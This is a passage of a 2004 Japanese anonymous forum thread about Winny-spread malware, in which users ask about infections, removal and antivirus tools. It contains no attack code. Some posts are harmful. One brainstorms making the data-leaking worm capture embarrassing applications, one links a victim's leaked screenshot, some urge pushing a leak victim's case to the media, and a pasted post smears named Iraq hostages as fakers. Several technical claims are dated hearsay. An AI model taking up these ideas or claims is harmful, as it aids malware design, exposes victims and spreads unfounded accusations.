224 :[名無し]さん(bin+cue).rar:04/04/08 14:26 ID:wH/2vx8Q
>>223
フォルダやドライブは、右クリックして”エクスプローラ"で開く。
左にドライブツリー、右にファイル一覧とニ画面構成のやつね。
右はもちろん"表示→詳細"で拡張子アリの一列表示で。
フォルダを開くときは必ず左のフォルダツリーの展開で行う。
アーカイバやインストーラが動作直後に、新しいウインドウで
フォルダを開いてくれることがあるけど、そういうのはすぐ閉じて
使わない。かならずエクスプローラから開く。

これでフォルダアイコンをダブルクリックで開く必要がなくなる。
この使い方、別に偽フォルダ回避のためではなくて、大量の
ファイルを扱うのにラクだからやってる方法だけど。

225 :[名無し]さん(bin+cue).rar:04/04/08 14:36 ID:5oxQb+uU
html内のスクリプトからexeが実行されるように仕込まれていた場合、
間違って実行してしまっても、スクリプトが無効にしてあったら大丈夫なんでしょうか?
ノートン(4/4にウイルス定義更新)だとウイルスが見つからなかったもので、
思わずfolderをクリックして・・・((((((;゚Д゚))))))ガクガクブルブル
一緒に入っていたexeファイル自体はクリックしてないんですが・・・

226 :[名無し]さん(bin+cue).rar:04/04/08 14:51 ID:k5d3kWI5
>>217
あのぉ、ちょっと聞きたいんですけど
OSのシステムファイルの類はディスク上での位置が決まっているから
単純にコピーや上書きしても、OSとしては機能しない。
ってのがMS-DOSでは常識だったんですど、Windowsでは大丈夫なのですか?

それと、感染したDLLなんかをOSがガッチリと掴んでいた場合、
Windowsが起動している状態ではそれは上書き出来ないで
そのまま残ってしまうと思うんですけど、気のせいですか?

227 :[名無し]さん(bin+cue).rar:04/04/08 14:58 ID:k5d3kWI5
>>225
まだその.folderが残っているのであれば、自分で確認してみてはいかがでしょうか?
まず、実行しても無害なメモ帳などのexeを用意して
.folderにあるスクリプトの内容を、その無害なexeを実行させるように書き換える
そうしておいてから、もう一回その.folderをクリック
それで、メモ帳が立ち上がらなければセーフ。立ち上がってしまったらアウト。

228 :[名無し]さん(bin+cue).rar:04/04/08 15:22 ID:5oxQb+uU
>>227
早速、その方法を試してみました。
「現在のセキュリティ設定では、このページのアクティブXコントロールは実行できません」
と出てきて、実行されませんでした。どうやら、大丈夫のようですね・・・
ありがとうございました。

229 :[名無し]さん(bin+cue).rar:04/04/08 15:23 ID:olFnGMPz
>>225
あれはobjectタグからexeを起動するからスクリプトの有効・無効は関係ない。

>>226
Windowsは全てをコピーしてOSをバックアップできる。
ん、NT系はコピーもできないファイルがあるか。
上書きは当然別のPCに繋いでするか別パーティションに入れたOSからしかできない。

230 :228:04/04/08 15:28 ID:5oxQb+uU
>>229
・・・え!?
じゃあ、まだ感染してる可能性があるってことでしょうか?

231 :[名無し]さん(bin+cue).rar:04/04/08 15:37 ID:olFnGMPz
>>230
スクリプト以外のセキュリティの設定で実行されないことはありうるから、
ま、安心していいかも。

232 :228:04/04/08 16:01 ID:5oxQb+uU
>>231
とりあえずは安心と見て良さそうですね。
ありがとうございました。

233 :226:04/04/08 16:09 ID:k5d3kWI5
>>229
なるほど、WindowsはコピーでOKなんですね。ありがとうございました。



234 :[名無し]さん(bin+cue).rar:04/04/08 16:26 ID:MRj0Ioaq
新品のHDDにまるごとコピーしただけじゃ動かないけどね

235 :[名無し]さん(bin+cue).rar:04/04/08 16:29 ID:1gieTN8V
>>234
そりゃそうだ。

236 :[名無し]さん(bin+cue).rar:04/04/08 16:38 ID:j9UGpdQ6
>>99
故意かどうかでなく、
逮捕のポイントは「他人の著作物を不特定多数が送信できる状態にした」
ことだから、「」内の証明にならないものは意味がないということ。

例えば、「山田一郎」名義で一太郎のファイル全部入りのデータfがJust
systemにメールで送信されてきたとして、それは「その人からそういうデータ
が送られて来た」ことしか意味しないので、山田一郎さんが一太郎を不特定
多数にバラまいていたのだと証明する根拠にならない。

あと、より単純な問題として、数十人・数百人の感染者からHDD内で一番巨
大なファイルが、どんどん送られてきたら、それは単なるメールボム。

237 :[名無し]さん(bin+cue).rar:04/04/08 17:07 ID:QjnmOTEu
キンタマで個人情報晒されるとしたら、それは
Documennts and Settingの後ろのユーザー名だよな。
それが流れてなかったら一安心?

238 :[名無し]さん(bin+cue).rar:04/04/08 17:11 ID:TDi5QUmS
質問でつ
最近mp3に偽装していて、zipを解凍しただけで、
感染するキンタマがあるらしいんですけど、
それってファイルサイズ変わってますか?
(例)200KBみたいに明らかにサイズがおかしくなるとか。
知ってる人教えてください。

239 :[名無し]さん(bin+cue).rar:04/04/08 17:18 ID:K4cKV5Jp
AVG Free まだキンタマに対応してない。
(キンタマ) 俺のデスクトップ りょう (04-03-20) (ファイル詰め合わせ).zip
が無害だって言ってる。
頼むよ、、、orz

240 :[名無し]さん(bin+cue).rar:04/04/08 17:56 ID:lC6vVYxw
>>239

AVGごときに何を期待してるんだか(w

241 :[名無し]さん(bin+cue).rar:04/04/08 17:56 ID:SPNW10U5
>>238
そんなもんは無いです

242 :[名無し]さん(bin+cue).rar:04/04/08 18:00 ID:VDyG58MU
>>237
安心?とかOK?とか聞く奴って、誰かが「うん安心だよ」といえば
それ鵜呑みにして安心するのか。セキュリティ意識のないやつらだ。

243 :[名無し]さん(bin+cue).rar:04/04/08 18:01 ID:VDyG58MU
>>238
そんなものはない

244 :[名無し]さん(bin+cue).rar:04/04/08 18:02 ID:m5h9/eLT
なんか最近よく出るmp3で感染とかの話題はもせスレから来てるのか?


245 :[名無し]さん(bin+cue).rar:04/04/08 18:02 ID:VDyG58MU
>>239
タダで使ってるソフトに文句言うな。
不満があるならノートンでもバスターでもウィルスキラー北斗の拳でも買え

246 :[名無し]さん(bin+cue).rar:04/04/08 18:03 ID:VDyG58MU
>>244
どんな無根拠な話でも、声高にしつっこく言い続ければ、
かならず信じる人間が現れる、というよいサンプル

247 :[名無し]さん(bin+cue).rar:04/04/08 18:08 ID:5w8VzBKN
>>239
ヒューリスティックでもだめか?

248 :[名無し]さん(bin+cue).rar:04/04/08 18:09 ID:wH/2vx8Q
>>237
PC内に個人を特定できるファイル(文書、email、チャットログetc)が
あれば、そこから身元が割れる。naoや両さんは、むしろそっちで
やられた

249 :[名無し]さん(bin+cue).rar:04/04/08 18:21 ID:K4cKV5Jp
>>240,245
ノー豚もバス田2003も入ってるよ。俺んとこのPC。
三種類のアップデートチェックも日課だよ。
オマケつけときゃAd-awareもspybotも入ってるよ。激重だようちのPC。

250 :[名無し]さん(bin+cue).rar:04/04/08 18:30 ID:6jtpwouQ
>>249
ノートンとバスター同時に入れることは不可能ですが何か?w
入れようとしたらアンインスコしろと警告出てきて不可能。
てかバスター2003だったら意味ないかと・・・
2004に乗り換えれ

251 :[名無し]さん(bin+cue).rar:04/04/08 18:39 ID:C7RXfPM7
まぁ、あれだ、感染して被害が出る場所
win,iniやregedit.exeなんかを書き換えられたりしたら、
コピーしたやつで上書き訂正すればいい。
他、勝手に書き換えられそうなのをピンポイントで
コピーしておけばいいんじゃない。

252 :[名無し]さん(bin+cue).rar:04/04/08 18:39 ID:DCtcy0jP
俺バスター2003だが、別にウイルス駆除だけなら2004に乗り換えても
特段意味はないと思う。(FWを別に使ってるならだけど)
でもノートンと2003って同時に入れられるか?
どうせかえるならノートンだろ…


253 :[名無し]さん(bin+cue).rar:04/04/08 18:45 ID:QMWmZv/+
antinny
やってしまいました。ただいま駆除完了。再検索中

254 :[名無し]さん(bin+cue).rar:04/04/08 18:50 ID:zI2IQmdk
>>249
ウイルス駆除ソフトは複数在中させるなとソフトに書いてなかったかい?

255 :[名無し]さん(bin+cue).rar:04/04/08 19:22 ID:j6E10Jar
ノートン+Antidoteがベストチョイスではないかと思われ。

256 :[名無し]さん(bin+cue).rar:04/04/08 19:27 ID:OLLZ40QU
どんなソフト使っても、使ってる奴が馬鹿なら何の意味もない・・・

257 :[名無し]さん(bin+cue).rar:04/04/08 20:04 ID:JWvEZNiN
シフクノオトから感染したようなのですが、自分は再起動していないので分からないのですが、
他の感染者によると再起動すると首が飛ぶ動画が出てくるらしいです。
感染後、ノートン先生がインターネットに接続しようとしたgro2.exeと言うファイルを止めてくれたので、
このgro2.exeと言うのが、ウイルス?ではないかと思うのです。(更新時刻等から見ても)
ただ、C:\Documents and Settings\Owner\Local Settings\Temp内のgro2.exeを削除しようとしても
アクセスが出来ないとかどうとかで削除出来ません。
どう対処すれば良いでしょうか?お知恵を拝借したいと。

258 :[名無し]さん(bin+cue).rar:04/04/08 20:20 ID:LJrjJ4jm
>>257
セーフモード・・・かな

259 :[名無し]さん(bin+cue).rar:04/04/08 20:33 ID:76PMzxRp
>>257
http://xp-delete.hp.infoseek.co.jp/tips.html

260 :[名無し]さん(bin+cue).rar:04/04/08 21:34 ID:f7F8Nz5V
>>258 >>259
ありがとうございました。セーフモードから消去できました。
やはり、gro2.exeが原因だったようで、再起動時グロは出てきませんでした。

261 :[名無し]さん(bin+cue).rar:04/04/08 22:01 ID:cfcm6rvj
>>260 どのシフクノオトのファイルだった?ハッシュ教えて。

262 :[名無し]さん(bin+cue).rar:04/04/08 22:41 ID:cfcm6rvj
別に、工夫したウィルスじゃなくても
適当にC言語でメッセージを作ってアイコンで偽装すれば
悪質なジョークソフトの出来上がりだよね?

263 :[名無し]さん(bin+cue).rar:04/04/08 23:22 ID:jJb0aFdc
キンタマならソフト無くても自力で直せるけどな

自分のはうpファイル作成までされていなかった・・・
そこで他の連中のを探したのだが、エロゲヲタなデスクトップやら色々オモロイのだが

これなんか特に
http://www.gazo-box.com/wara/img-box/img20040408231152.jpg
一足遅かったようだね

264 :[名無し]さん(bin+cue).rar:04/04/08 23:45 ID:gk+CPRr7
>>263
捏造認定( ̄ー ̄)

265 :[名無し]さん(bin+cue).rar:04/04/08 23:50 ID:eXNkPAGX
最近コントロールパネルを開いて数分すると突然explorer.exeが終了する症状が出てる・・・これってもしや

266 :[名無し]さん(bin+cue).rar:04/04/08 23:57 ID:xZMBnL66
>>74のなんか何でバスターも先生もすぐに対応しないかな。
自分の自動実行を殺されるなんてウィルス駆除会社としてなめられてると思わんのかね。
それともこういうウィルスって多いの?
バスターと先生をねらって止めるやつとか。
これじゃもっと無名なソフト使ったほうが安心だとか、なりかねん気がするが・・。

267 :[名無し]さん(bin+cue).rar:04/04/09 00:05 ID:Did69Bzh
>>243
何年か前に、映画のAVIファイルに仕込まれてるウィルスあったじゃん。
ある場所まで見ると、問答無用でHDをフォーマットするってやつ。
MP3でも、そういうのあるんじゃないの?


268 :[名無し]さん(bin+cue).rar:04/04/09 00:22 ID:sWonYrVS
>>264
本人キター

269 :[名無し]さん(bin+cue).rar:04/04/09 00:26 ID:HmfJdBDM
>>267
アプリケーションにバッファオーバーフローが生じるというバグが無い限り、
単なるデータファイルがウィルスとして活動することは理論上不可能。
今のところ、WinAmpにはその手のバグがあるらしいので、そこを衝いたウィルスだと、
WinAmpで再生した場合に限り、ウィルスが発動するというのは有り得る話ではある。
しかし、そういうウィルスを作成するのは極めて難しく、そこらのキンタマ職人に作れるとは思えない。
よって、この手の「再生しただけで〜」「解凍しただけで〜」というのは、
アイコンを偽装したexeに気付かなかった人がそう勘違いしているものだと言って間違いない。

「WinAmp」に危険度“高”の脆弱性
ttp://www.itmedia.co.jp/news/articles/0404/06/news016.html

270 : :04/04/09 00:37 ID:+Mjjk0te
>>269
>よって、この手の「再生しただけで〜」「解凍しただけで〜」というのは、
>アイコンを偽装したexeに気付かなかった人がそう勘違いしているものだと言って間違いない。

あとは再生アプリが 「勝手に解釈して『再生以外の動作』をする場合」とかね・・・。
IEがイイ例だ。ブラウジングだけやってりゃイイものを、イロイロと勝手に解釈して(ry

271 :[名無し]さん(bin+cue).rar:04/04/09 00:46 ID:t7kH1Wu5
WMVでも「勝手に解釈して」webアクセスするやつなかったっけ?

272 :[名無し]さん(bin+cue).rar:04/04/09 00:57 ID:m8mVmvmL
デスクトップで検索するとスクショでまくりだな
得ろ同人誌落としまくろうとしてるやつもいれば、MMOで自キャラムキ出しの奴もいる
キンタマに感染してしまってAVGのことを調べてるやつもいる。そもそもの原因を知らないのか、懲りずにwinny常駐。

273 :[名無し]さん(bin+cue).rar:04/04/09 01:12 ID:FXHsTXYY
動画が再生されている場面が取られている画像って捏造だろ?
どうやってオーバーレイを掻い潜るんだ?
それともオーバーレイ切って見るのがダウソ流か?そんなまさか。

274 :[名無し]さん(bin+cue).rar:04/04/09 01:33 ID:761R775p
>>273
捏造の可能性が高いが絶対とは言い切れない。
先にオーバーレイするアプリが動いていると、後から起動したアプリは
起動しないか、低速モード(オーバーレイでない)で起動するはず。


275 :[名無し]さん(bin+cue).rar:04/04/09 01:35 ID:HmfJdBDM
>>273
ものによってはオーバーレイが効かない動画もある。
それに、複数立ち上げてればオーバーレイは一つ目しか有効にならない。

276 :[名無し]さん(bin+cue).rar:04/04/09 01:38 ID:ey2KlFuX
>>273
たぶんそう。

おそらく、これみよがしにウィルススキャンしてる所やエロ画像観てるところ
なんかも、多くは捏造かと。

nyで検索ワード「ホモ」(登録ダウンワードがこれ一個のみ)でショタホモ画像
ダウンロードしてるスクリーンショットあったけど、あれなんかも露骨に「見ても
らうためにわざわざセッティングして撮った」感じがありありと。

277 :[名無し]さん(bin+cue).rar:04/04/09 01:41 ID:ey2KlFuX
たくさんスクリーンショット見て思ったけど、そうそう面白いのは撮れませんね。
まあランダムに撮ってるんだから当たり前ですが。

いいSSが撮れそうなアイディア無いかなあ。アプリの起動を監視して、見られ
たら恥ずかしい情報がありそうなアプリ(アウトルック、2ch専用ブラウザ等)
が起動したらそれを撮るとか。

278 :[名無し]さん(bin+cue).rar:04/04/09 02:07 ID:cFxJDPa9
バスター
ANTINNY.Kに対応した模様
って皆知ってるか・・・

279 :[名無し]さん(bin+cue).rar:04/04/09 02:46 ID:wEUWfJd7
http://pc3.2ch.net/test/read.cgi/sec/1080908533/435

ワラタ

280 :[名無し]さん(bin+cue).rar:04/04/09 02:57 ID:VwsNLlNF
exeとかzipダウソしなきゃ感染しないよね?

281 :[名無し]さん(bin+cue).rar:04/04/09 03:09 ID:h+lHh4Gx
赤い服着た眼鏡の男って誰なんですか?


282 :[名無し]さん(bin+cue).rar:04/04/09 03:30 ID:P2BX7G2c
>>280
感染するものだったら画像ファイルとかもあるぞ。
大抵のは実行(読み込み)しなければOK。winnyで流行ってる奴も。
ウイルス対策ソフト入れて勉強しとけ

包茎

283 :[名無し]さん(bin+cue).rar:04/04/09 03:52 ID:HmfJdBDM
>>282
バッファオーバーフロー以外に、画像ファイルの読み込み・表示で
どうやったらウィルスが活動できるのか、詳細希望。

また、画像ビューアに関して現在対策の施されていないバグの情報があるのならそれも教示されたし。

284 :[名無し]さん(bin+cue).rar:04/04/09 03:58 ID:07M/JXsX
>>283
できない

それ以前に、画像ビューアにはMP3におけるWinAMPみたいな「大半の人が
これを使っている、メクラ撃ちしても確実にヒットする超定番」がないから、
特定ソフトのバグターゲットのウィルスなんて労多くして効果なし。

動画に関してはWMPとRealPlayerくらいだけど、これらのセキュリティホール
は「事件」扱いになるから、穴があるのに誰もしらない報道もされないという
状況もそうそうあるもんではない。


285 :[名無し]さん(bin+cue).rar:04/04/09 04:55 ID:wSboIf1x
>>284
特にビュアー入れてないとjpegなんかIEで開かない?
スキル低めなところを狙ってIEの穴ってのはダメかな

286 :[名無し]さん(bin+cue).rar:04/04/09 05:56 ID:nfnLTF6+
変な質問なんだけど
AntinnyG,Kは知ってるんだが
H、I、Jも存在すんの?

287 :[名無し]さん(bin+cue).rar:04/04/09 07:34 ID:WvrpYMFZ
>>285
ダメかな、ってそんなに作りたければ自分の判断でやれよ

288 :[名無し]さん(bin+cue).rar:04/04/09 07:56 ID:Us2+RyDP
>>286
W32があるならW31ってなんだろう
なんて考えたことあるタイプ?

289 :[名無し]さん(bin+cue).rar:04/04/09 08:18 ID:NyqUi0jV
なんか、分からんが2004のノートン先生は動画でもなんでも
毎回立ち上がってチェックしているようです。遅くでイライラします。

290 :[名無し]さん(bin+cue).rar:04/04/09 09:23 ID:8JlbguNC
>>286
ウィルスの名前ってソースコードの特徴的な単語を取って
付けたりすんじゃなかったっけ?

291 :[名無し]さん(bin+cue).rar:04/04/09 10:23 ID:fEwpzdJC
ほんの僅かな間違いから一夜にして感染。
テンプレどおりに作業したものの、キャッシュフォルダ全消去は痛い…('A`)

292 :[名無し]さん(bin+cue).rar:04/04/09 10:51 ID:VbXYW3NP
ttp://www.itmedia.co.jp/news/articles/0404/09/news012.html
これのwindows版が出たら、、、
(((( ;゚Д゚)))ガクガクブルブル

293 :[名無し]さん(bin+cue).rar:04/04/09 12:04 ID:toeEjGjS
>>292
そうだな。考えただけでも、
(((( ;゚Д゚)))ガクガクブルブル

294 :[名無し]さん(bin+cue).rar:04/04/09 12:41 ID:Did69Bzh
もはや見たことがないMP3やJPEG、GIF、QuickTimeファイルは安全とは言えなくなるだろう

 
画像もダメなら、ネット終わりでは?

295 :[名無し]さん(bin+cue).rar:04/04/09 12:42 ID:bOE+sCAO
ダウソした物いちいちノートンでスキャンしながらやってるんですけどそれでもダメ?

296 :[名無し]さん(bin+cue).rar:04/04/09 12:48 ID:tTFXNho8
※日本国民たるものこれ読んだら最低3カ所にコピペすべし、捏造自作自演許すまじ

http://www.clubwee.com/diary/diary.cgi 高遠菜穂子さん主催 "NATURE"=高遠さん
http://www.clubwee.com/ みんなの掲示板(ここに今井書き込みがあると疑われるが、証拠隠滅の為現在閉鎖中)

前日に事件をほのめかすような情報がネットワークに上がる
    [208] ヒミツの大計画!(笑) 投稿者:今井です 投稿日:2004/04/07(Wed) 09:57

    今日は週刊朝日の記者さんと知り合いになりましたよ!
    アンマンで取材されているフリーライターなんだって。
    とりあえず仲良くなったところで、郡山さん(記者さんね!)が、
    あるとっておきの計画を持ち出したよ!
    これってサイコーかも?(笑)
    歴史に名前を残す大偉業のような気がする!
    一緒に聞いていた高遠さんも乗り気みたいだし、
    これはやってみる価値アリだとおもうね。

    そのうち日本でもニュースになると思うから、ガッ!してね


297 :[名無し]さん(bin+cue).rar:04/04/09 13:46 ID:HmfJdBDM
>>292
なぬ!バグと一緒にウィルスまで見つかったのか!!
ってか、アンチウィルスを対応させたのはいいけど、セキュリティパッチもとっととリリースしろよ。>林檎

しかし、Windowsも他人事じゃないよな、エクスプローラで変なavi選択するとエクスプローラ異常終了するし。。。
細かい技術的なことはわからんが、そこを衝けばウィルス作れるんじゃないのか?

298 :[名無し]さん(bin+cue).rar:04/04/09 14:09 ID:laGoNbPO
キンタマかかっちゃったんだが駆除方法がぜんぜんわからん( ; ゚Д゚)
>UpFolder.txtの中で指定された場所に、readme.filesフォルダがあるので、それを削除する。

どこにうpフォルダ.txtあるんだい?

299 :[名無し]さん(bin+cue).rar:04/04/09 14:12 ID:tEHMJV2j
>>297
> なぬ!バグと一緒にウィルスまで見つかったのか!!
ウィルスはバグを狙って作られるほうが多い。

> そこを衝けばウィルス作れるんじゃないのか?
昔からそう。

300 :[名無し]さん(bin+cue).rar:04/04/09 14:40 ID:Qb6Y/FBk
>>298
ぐぐれ
それだけでは治らないし。
治ってると思ってる厨房たちは、レジストリエディタがNotepadに上書きされている罠
そこも直して
さらにレジストリを元に偽造実行ファイル(複数あるよ)が色んなフォルダに隠れてるから探してね

301 :[名無し]さん(bin+cue).rar:04/04/09 14:58 ID:laGoNbPO
デタ━━━━(゚∀゚)━━━━!!

またわけわからなくなったら来ます

302 :[名無し]さん(bin+cue).rar:04/04/09 15:29 ID:laGoNbPO
うpフォルダ.txtのなかにreadme.filesなんてないけどどーゆーこと?
キンタマじゃないのかな〜とも思ったけどしっかり晒し挙げされてるし_| ̄|○
消した覚えなんて全くないんだがスルーしていいのかな?

303 :[名無し]さん(bin+cue).rar:04/04/09 15:40 ID:LnaSjziQ
解凍するだけで、感染するウィルスってあるのでしょうか?

304 :[名無し]さん(bin+cue).rar:04/04/09 16:04 ID:y2bYnpse
ログ嫁や

305 :[名無し]さん(bin+cue).rar:04/04/09 16:22 ID:6mJ/ZpyS
解凍したとき開く設定だとヤバイ

306 :[名無し]さん(bin+cue).rar:04/04/09 16:29 ID:OY6J1Y2k
漏れの友達でキンタマ感染したのがいて、状況証拠的には1週間活動してたようで、
漏れが駆けつけたときにはプロセスもしっかり動いてた。
でも、どういうわけか晒し挙げSSやファイル詰め合わせは見つからず、
「運が良かった」でその場は済ませてしまったんだけど、
http://tmp2.2ch.net/test/read.cgi/download/1081258774/753
のような指摘もあるし、安心できないのが分かった。

もしよければ晒し挙げされた方に聞きたいんだけど、
晒し挙げはUpフォルダ内で見つかりました?
それともキャッシュ化されて、晒し挙げJPGそのものは消されてました?
すんませんが、教えてやっても良いって方、お願いしますだ。

307 :[名無し]さん(bin+cue).rar:04/04/09 16:38 ID:E6d9GVHf
>>285
ダメかな、じゃなくて、「IEの画像表示でバッファオーバーフローを引き
起こす既知のバグ」がないじゃん。

308 :[名無し]さん(bin+cue).rar:04/04/09 16:39 ID:IRTTln++
http://pc3.2ch.net/test/read.cgi/sec/1081443487/
パンダスレ

オンラインでのウィルス検索・駆除・削除可能!

309 :[名無し]さん(bin+cue).rar:04/04/09 17:00 ID:laGoNbPO
な〜んか知らんけどreadme.files見つからなくていろいろ探す&ほかの駆除やったあと再起動したらなんでかしらんけどうpフォルダにSSうpされなくなったよ。

レジストのほうも書き換えられてないから直ったのかねぇ・・・・?



>>306
状況証拠的に〜とかプロセスとかPCのことはよくわからんが自分の場合はうpフォルダの中に【晒し挙げ】ユーザー名のデスクトップ[日付]で詰め合わせとjpgとで晒されてたよ。

310 :[名無し]さん(bin+cue).rar:04/04/09 18:11 ID:zekit/uM
スイマセン。
質問があります。

キンタマやAntinnyなどの
ウイルスに感染してしまい
UPフォルダが勝手に出来てしまった場合、
どこにUPフォルダが出来てしまうのしょうか?

僕の場合、自分でUPフォルダを
作った覚えが無いのに
Winnyを立ち上げてシステム情報をみると
UPフォルダが2つになっています。

そのUPフォルダの場所がわからなくて・・。

教えて君で申し訳ありませんが
アドバイスお願いいたします。


311 :[名無し]さん(bin+cue).rar:04/04/09 18:16 ID:GoxcId8k
>>310
winny止めるといいよ

312 :[名無し]さん(bin+cue).rar:04/04/09 18:22 ID:tDkyuJhH
だね

313 :[名無し]さん(bin+cue).rar:04/04/09 18:23 ID:ByUOgChZ
スレや関連リンク読まずに書き込んでる人に
まともに答える人などおらんだろ…

314 :[名無し]さん(bin+cue).rar:04/04/09 18:24 ID:PML+l/r5
ネトランは責任とってウイルス駆除方法を記事にしてやれよ

315 :306:04/04/09 18:31 ID:OY6J1Y2k
>>309
ありがとう。状況証拠ってのは本人の記憶で偽装EXEを実行したときのことで、
プロセスはXPのサービスとして起動されてたキンタマEXEのつもりだった。
アップフォルダはダウンフォルダと同じ場所を指定されてたんだけど、
漏れが見たときにはSSも詰め合わせも無かったんだけど、
ダウンフォルダなんで本人が自分がダウンしたものと勘違いして捨てた可能性もある。
今となってはどうしようも無いんだけど、履歴書とか置いてたらしいから・・・。
個人的にはいくらなんでもダウンフォルダにあったとは言え、
自分の名前のついたファイルくらい気づくかなと思うし、
「アップされなかった」と言っとこうと思う。情報サンクス。

>>310
Winnyの入ったフォルダに、Upfolder.txtってのが勝手に作られてて、
そこにアップフォルダのパスが書かれてた。

316 :[名無し]さん(bin+cue).rar:04/04/09 18:41 ID:FW9QDBFT
人ごとだと思ってたから今更見たが、飯泉って人大変なことに
なってしまったんだね。

超こえー 俺だったら逝ってるな

317 :[名無し]さん(bin+cue).rar:04/04/09 18:45 ID:1nYP9x2e
naoはいまも生きているのだろうか・・・
誰かこのネタを他テレビ局に垂れ込んでみてよw

318 :[名無し]さん(bin+cue).rar:04/04/09 18:47 ID:1nYP9x2e
ってかIDにnYキタ━━━━(゚∀゚)━━━━!!
週刊現代とか好きそうなネタだよね、naoの件は

319 :[名無し]さん(bin+cue).rar:04/04/09 18:51 ID:FW9QDBFT
>>317
やめた方がイクナイ?

もう一生分のダメージ受けてるよ

320 :[名無し]さん(bin+cue).rar:04/04/09 19:55 ID:twDpJgDC
話の腰を揉むようだけど、
「違法ファイル集めてます」ウィルスは
駆除できないのDEATHか?

321 :[名無し]さん(bin+cue).rar:04/04/09 20:11 ID:kNDMK8Y9
> 誰かこのネタを他テレビ局に垂れ込んでみてよw

中学生臭い書き込みだ

322 :[名無し]さん(bin+cue).rar:04/04/09 20:31 ID:qgYlvxQe
イラクからのCD-Rにずっこけ三人組の実名入りの
キンタマが入ってて、それが報道に関わった日本人TVマンの
ノートPC経由で国内に持ち込まれて大繁殖したら面白い

323 :[名無し]さん(bin+cue).rar:04/04/09 20:34 ID:g/iKe8FU
>>322
いや、ちっとも面白くないけど。

あなたは面白いと思ったんだ。その思いつきを。
ふうん。

324 :[名無し]さん(bin+cue).rar:04/04/09 21:02 ID:tuRieEQ/
>>322
君は長い間 鏡をマトモに見てない人種じゃないのか?

325 :[名無し]さん(bin+cue).rar:04/04/09 21:20 ID:65kVoI04
>>320

×話の腰を揉むようだけど
○話の腰を折るようだけど

日本語わ正しく掛けや

326 :[名無し]さん(bin+cue).rar:04/04/09 21:21 ID:8JlbguNC
>>325
御前が壱版正しく仕えてない

327 :[名無し]さん(bin+cue).rar:04/04/09 21:29 ID:65kVoI04
)*)=3 プッ

328 :[名無し]さん(bin+cue).rar:04/04/09 22:04 ID:69BENgzi
(ファイル詰め合わせ).zip は W32.Pinfi ウィルスに感染しています。

さては感染したファイルをわざとデスクトップに置いてるな、これ

329 :老氏:04/04/09 23:12 ID:m0TbeN1A
最近nyでウイルス「WORM_AGOBOT.HH」に感染してしまって、HDDをフォーマットして
OSを再インストールしたんですがどうやらまだ直ってないみたいで、nyのキャッシュ
が勝手に消えています。完全に治す方法はないですか?

330 :[名無し]さん(bin+cue).rar:04/04/09 23:17 ID:tDkyuJhH
>>329
nyをやめる

331 :[名無し]さん(bin+cue).rar:04/04/09 23:18 ID:3cRrtZF4
>>329 OS再インストールしても直らないウィルスは存在しません。

332 :老氏:04/04/09 23:25 ID:m0TbeN1A
はい、直るまではnyをやめることにしています。
今日フォーマットしてOSを入れなおしてすぐにウイルスバスターで検索すると
すでにウイルスが引っかかりました。「修復しました」と出たのでnyをやり始
めいくらかキャッシュが溜まったところで一旦キャッシュの再チェックすると
やはり消えてしまいました。

333 :[名無し]さん(bin+cue).rar:04/04/09 23:28 ID:3cRrtZF4
>>332 本当に再インストールしたの?
有り得ないよ、そんな事。

334 :[名無し]さん(bin+cue).rar:04/04/09 23:29 ID:m0TbeN1A
そうなんですか?

335 :老氏:04/04/09 23:29 ID:m0TbeN1A
↑の俺です。

336 :[名無し]さん(bin+cue).rar:04/04/09 23:31 ID:LOpLFjHk


             ↑


       ←   俺です   →


             ↓

337 :[名無し]さん(bin+cue).rar:04/04/09 23:32 ID:3cRrtZF4
もしかして、キャッシュフォルダがあるドライブはフォーマットしてない?

338 :336:04/04/09 23:33 ID:LOpLFjHk
すべてを支配した 残念だったな

339 :[名無し]さん(bin+cue).rar:04/04/09 23:33 ID:7WqOaR1M
↑しかないだろ

340 :[名無し]さん(bin+cue).rar:04/04/09 23:34 ID:3cRrtZF4
例えば、
C:\ ←システム関係やProgram Filesなど
D:\ ←動画やキャッシュなど、普通のファイル

で、この場合、C:\だけをフォーマットして再インストールしたのですか?

341 :[名無し]さん(bin+cue).rar:04/04/09 23:36 ID:+Gwt5LJy
バスターが修復→隔離フォルダにキャッシュが移動→消えちゃったじゃなくて?

342 :老氏:04/04/09 23:40 ID:m0TbeN1A
キャッシュが消えたのは単に移動したのではないと思います。今までキャッシュ
が移動されたことはないですし、試しに溜めたキャッシュも毎回ちがいますし。
フォーマットしたドライブはドライブ全体を消しました。


343 :[名無し]さん(bin+cue).rar :04/04/09 23:46 ID:yqSx+Lzs
エロゲ落としてインスコしようとdeamonでマウントしたら
ドラクエの呪われた時の曲が流れて赤い線みたいなんが
縦から画面全体を覆いはじめる始末、検索したら
bag.exeが入ってた、削除して再起動したら問題なかったけど・・・
大丈夫かな?

344 :[名無し]さん(bin+cue).rar:04/04/09 23:47 ID:+Gwt5LJy
>>342実は漏れも一昨日再インスコしましたよ

345 :[名無し]さん(bin+cue).rar:04/04/09 23:49 ID:uMfOPIfQ
最近nyやってると必ずポートスキャンかけられてるんだが、またny狙って変な事やってる奴でもいるのかね?

346 :[名無し]さん(bin+cue).rar:04/04/09 23:54 ID:ZkxZ73mr
>342
どこかにバックアップしてあったファイル(たとえばny
が感染済なんじゃないのか

ちなみに、バスターでもノートンでも引っかからないウイルス
なんて普通にあるぞ

347 :[名無し]さん(bin+cue).rar:04/04/09 23:56 ID:3cRrtZF4
>>345 BBS関係でポートスキャンが実装されている。気にする必要はないと思う。

348 :[名無し]さん(bin+cue).rar:04/04/09 23:58 ID:3cRrtZF4
ウィルス(・∀・∀・)どうぞ!
違法なファイルなんて共有してるからだよw
トロイも(・∀・∀・)仕込みました!
これで、いつでも Your PC に侵入出来ますww

というメッセージが出るウィルスがあるな。
仮想マシンで確認した。名前は、setup.exeだった。

349 :[名無し]さん(bin+cue).rar:04/04/09 23:58 ID:uMfOPIfQ
>>347
なるほど。1ヶ月位前は全く無かったのになあ・・。ま、ブロックしてるみたいだしいいか。

350 :老氏:04/04/10 00:00 ID:ZF3bfsP5
ny関係のファイルはバックアップを取っていません。nyは新しくサイトから
落としました。

351 :老氏:04/04/10 00:05 ID:ZF3bfsP5
ちなみにセットアップのフォルダがあったのでバックアップを取っていました。
それが原因であることも考えられますよね・・・。

352 :[名無し]さん(bin+cue).rar:04/04/10 00:07 ID:7+6c0rzZ
>>342
nyなんてやめちまえよ池沼が。

353 :[名無し]さん(bin+cue).rar:04/04/10 00:08 ID:KzcuM+PF
>>263
壁紙キモ━━━━━(´Д`lll)━━━━━ッ!!!!

354 :[名無し]さん(bin+cue).rar:04/04/10 00:13 ID:qMjOS8FT
